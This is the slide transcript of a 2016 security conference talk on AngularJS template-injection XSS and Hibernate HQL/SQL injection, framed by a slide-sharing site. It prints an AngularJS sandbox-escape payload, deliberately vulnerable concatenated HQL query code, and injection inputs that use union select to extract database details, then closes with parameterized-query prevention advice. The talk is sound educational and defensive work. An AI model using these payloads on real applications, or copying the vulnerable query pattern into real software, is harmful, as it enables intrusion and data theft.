Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Advanced XSS and Injection Attacks

Casey Dunham
May 21, 2016
Programming
1
1.2k

Advanced XSS and Injection Attacks

Presentation on XSS in AngularJS and Hibernate SQL Injection given at Security BSides Boston 2016.

Links to the demo application:

https://github.com/caseydunham/angularjs-sandbox
https://github.com/caseydunham/hibernate-sandbox

Casey Dunham

May 21, 2016
Tweet

More Decks by Casey Dunham

See All by Casey Dunham
Hibernate Blind SQLi MISC 2016
caseydunham
0
500
Using OSINT to Attack Web Applications
caseydunham
2
230

Other Decks in Programming

See All in Programming
ピラミッド、アイスクリームコーン、SMURF: 自動テストの最適バランスを求めて / Pyramid Ice-Cream-Cone and SMURF
twada
PRO
9
1k
qmuntal/stateless のススメ
sgash708
0
120
EventSourcingの理想と現実
wenas
6
2.1k
Streams APIとTCPフロー制御 / Web Streams API and TCP flow control
tasshi
1
290
VR HMDとしてのVision Pro+ゲーム開発について
yasei_no_otoko
0
100
レガシーな Android アプリのリアーキテクチャ戦略
oidy
1
170
offers_20241022_imakiire.pdf
imakurusu
2
360
cXML という電子商取引の トランザクションを支える プロトコルと向きあっている話
phigasui
3
2.3k
とにかくAWS GameDay!AWSは世界の共通言語! / Anyway, AWS GameDay! AWS is the world's lingua franca!
seike460
PRO
1
550
生成 AI を活用した toitta 切片分類機能の裏側 / Inside toitta's AI-Based Factoid Clustering
pokutuna
0
580
JaSST 24 九州:ワークショップ(は除く) 実践!マインドマップを活用したソフトウェアテスト+活用事例
satohiroyuki
0
260
Pinia Colada が実現するスマートな非同期処理
naokihaba
2
160

Featured

See All Featured
Adopting Sorbet at Scale
ufuk
73
9k
GitHub's CSS Performance
jonrohan
1030
460k
We Have a Design System, Now What?
morganepeng
50
7.2k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
37
1.8k
Designing for Performance
lara
604
68k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
32
1.8k
GraphQLの誤解/rethinking-graphql
sonatard
66
9.9k
It's Worth the Effort
3n
183
27k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
107
49k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
28
7.9k
Done Done
chrislema
181
16k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
3
370

Transcript

  1. Advanced XSS and Injection Attacks

  2. Agenda • Introduction • AngularJS Expressions • AngularJS XSS •

    HQL SQLi • Prevention • Q + A

  3. Introduction • Casey Dunham • Security Consultant for GuidePoint Security

    • Application Security • Code Reviews • Assessments • OWASP Maine • DC207 • TOOOL @CaseyDunham @GuidePointSec

  4. AngularJS Expressions

  5. None

  6. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong class="price">{{ product.price | currency }}</strong> <button type="button" ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  7. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  8. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  9. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  10. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  11. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  12. •Evaluated against a scope object •Evaluation is forgiving to undefined

    and null •Filters can be used to format data before displaying it •No Control Flow Statements •No Function Declarations •No RegExp Creation With Literal Notation •No Object Creation With New Operator •No Bitwise, Comma, And Void Operators Versus JavaScript Expressions

  13. AngularJS XSS

  14. • Gareth Heyes (PortSwigger) • XSS without HTML: Client-Side Template

    Injection with AngularJS • http://blog.portswigger.net/2016/01/xss-without- html-client-side-template.html Prior Research

  15. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }} Sandbox Escape

  16. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  17. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  18. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  19. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  20. DEMO

  21. Hibernate Overview

  22. • Mikhail Egorov / Sergey Soldatov • ORM2Pwn: Exploiting Injections

    in hibernate ORM • Zeronights 0x05 • New Methods for Exploiting ORM Injections in Java Applications • HITB 2016 (Later this May) Prior Research

  23. • Renaud Dubourguais • HQL : Hyperinsane Query Language •

    Safety Symposium on Information and Communication Technologies (SSTIC) 2015

  24. “Hibernate ORM (Hibernate in short) is an object-relational mapping framework

    for the Java language. It provides a framework for mapping an object-oriented domain model to a relational database.” - Wikipedia

  25. “Hibernate's primary feature is mapping from Java classes to database

    tables; and mapping from Java data types to SQL data types.” - Wikipedia
  26. None

  27. public class Customer { private Long id; private String name;

    private String accountId; public Long getId() { return id; } public void setId(Long id) { this.id = id; } … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

  28. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  29. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  30. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  31. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  32. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  33. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  34. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  35. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  36. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  37. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  38. @Entity @Table(name=“customer”) public class Customer { @Id @GeneratedValue( strategy=GenerationType.IDENTITY )

    private Long id; @Column( name=“name”, nullable=false ) private String name; @Column( name=“account_id”, nullable=false ) private String accountId; … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

  39. Exploiting HQL Queries

  40. • Similar to SQL • Fully Object Oriented • Uses

    mapped objects and their properties • More limited than SQL Hibernate Query Language

  41. from Customer c where c.accountId = ‘acme_123’ Mapped Object Object

    Property Object Alias

  42. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }

  43. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }
  44. None
  45. None

  46. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + query + “%'";

  47. Let’s Fix Our Injection String query = "' or 1=1

    or ''='"; String hql = "from Customer c where c.name like '%" + query + “%'";

  48. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + "' or 1=1 or ''='" + "%'";

  49. Success!

  50. • Enumerate other columns (properties)? • Access other mapped objects?

    So Now What?

  51. Screw that and let’s just get to the fun stuff.

  52. Blind SQLi

  53. HQL Injection SQL Injection

  54. Escaping HQL • In HQL the \ is a valid

    character • In HQL to escape a ' we use ‘' • Can combine these to pass along our SQL Injection through HQL
  55. None

  56. Success! • We can now continue along with a normal

    SQL Injection • But… • SQL needs to be Valid • HQL needs to be Valid as well

  57. Here’s where it gets tricky

  58. String hql = "from Customer c where c.name like '%"

    + query + "%'"; Injection Here

  59. http://localhost/search?q=test

  60. q=test' and 1='1

  61. None

  62. q=test' and '1\''=1 -- '='1

  63. q=test' and '1\''=1 union select 1,database(),3-- '='1

  64. None

  65. q=test' and '1\''=1 union select 1,database(),version()— '='1

  66. w00t!

  67. select customer0_.id as id1_0_, customer0_.account_id as account_2_0_, customer0_.name as name3_0_

    from customers customer0_ where ( customer0_.name like '%test' ) and '1\''=1 union select 1,database(),version()— '='1%'

  68. Prevention

  69. Prevention is the same as all SQL Injection

  70. Don’t use String Concatenation To Build Queries!!

  71. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  72. • Look for calls to • createQuery • createSQLQuery •

    All take HQL strings that could have potential for Injection.

  73. Q + A

  74. Thank You!

  75. @CaseyDunham